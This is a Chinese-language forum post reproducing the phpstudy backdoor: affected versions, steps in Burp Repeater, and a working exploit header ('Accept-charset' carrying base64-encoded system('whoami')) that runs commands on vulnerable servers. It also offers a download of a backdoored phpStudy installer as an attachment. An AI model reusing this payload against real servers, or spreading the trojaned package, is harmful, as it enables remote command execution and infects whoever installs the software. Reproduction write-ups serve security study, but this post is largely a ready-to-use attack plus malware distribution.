复现phpstudy后门事件

黑与白   ·   发表于 5天前   ·   技术文章

漏洞危害
高危

漏洞描述
攻击者可以利用该漏洞执行php命令,也可以称作phpstudy后门

影响版本
phpstudy 2016版 php-5.4
phpstudy 2018版 php-5.2.17
phpstudy 2018版 php-5.4.45

工具准备

phpsudy2016 -phpstudy2018

brup

漏洞复现
访问phpinfo页面

使用brup 抓住当前页面包

放入 Repeater模块中

利用代码
Accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding:

复现注意
第一注意版本问题,在官网已经 没有存在后门的phpstudy

Accept-charset: c3lzdGVtKCd3aG9hbWknKTs= 这一行 代码 就是 base64 编码过后执行的 代码

附赠存在后门 phpstudy

用户名金币积分时间理由
veek 50.00 0 2021-02-22 09:09:21 感谢分享~

打赏我,让我更有动力~

Attachment List

存在后门phpStudy20161103.zip   File Size:35.601M (Download Count:0)   Price:3

0 Reply   |  Until 5天前 | 144 View
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2021. All Rights Reserved. 掌控者

Powered by 掌控者